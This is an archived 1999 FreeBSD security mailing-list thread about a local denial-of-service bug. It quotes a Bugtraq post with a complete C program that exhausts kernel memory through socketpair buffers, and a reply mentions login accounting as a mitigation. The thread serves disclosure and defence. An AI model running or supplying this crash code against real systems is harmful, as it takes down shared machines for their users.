Date: Wed, 1 Sep 1999 11:49:41 -0600 (MDT) From: FreeBSD -- The Power to Serve <geniusj@free-bsd.org> To: Jeff Wheat <jeff@cetlink.net> Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD Message-ID: <Pine.BSF.4.10.9909011149020.18938-100000@free-bsd.org> In-Reply-To: <XFMail.990901123306.jeff@cetlink.net>
next in thread | previous in thread | raw e-mail | index | archive | help
If you have public access users, you should have login accounting in the
first place.. and yes, it does stop it :).. I verified this on a 3.2 box
with my login accounting setup..
On Wed, 1 Sep 1999, Jeff Wheat wrote:
> I have just verified that this code will indeed crash the following
> systems:
>
> Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1
>
> Alpha: 4.0-19990809-SNAP
>
>
> Regards,
> Jeff
>
> -----FW: <Pine.LNX.4.10.9908270039010.16315-100000@thetis.deor.org>-----
>
> Date: Fri, 27 Aug 1999 00:43:47 -0400
> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
> From: "L. Sassaman" <rabbi@QUICKIE.NET>
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Local DoS in FreeBSD
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> This was first posted to the FreeBSD security list on the 9th of August,
> subsequently discussed on freebsd-stable and freebsd-hackers... no one
> seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
> machines consistantly. I have also been told that it affects NetBSD and
> OpenBSD, though I haven't confirmed it.
>
> Someone with the know-how care to fix?
>
>
>
> L. Sassaman
>
> System Administrator | "Even the most primitive society has
> Technology Consultant | an innate respect for the insane."
> icq.. 10735603 |
> pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke
>
>
> - ---
>
>
> #include <unistd.h>
> #include <sys/socket.h>
> #include <fcntl.h>
>
> #define BUFFERSIZE 204800
>
> extern int
> main(void)
> {
> int p[2], i;
> char crap[BUFFERSIZE];
>
> while (1)
> {
> if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> break;
> i = BUFFERSIZE;
> setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> fcntl(p[0], F_SETFL, O_NONBLOCK);
> fcntl(p[1], F_SETFL, O_NONBLOCK);
> write(p[0], crap, BUFFERSIZE);
> write(p[1], crap, BUFFERSIZE);
> }
>
> return(0);
> }
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v0.9.10 (GNU/Linux)
> Comment: OpenPGP Encrypted Email Preferred.
>
> iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91
> TkVIqNdQpRi8CK9vySilouE=
> =7ufs
> -----END PGP SIGNATURE-----
>
> --------------End of forwarded message-------------------------
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.10.9909011149020.18938-100000>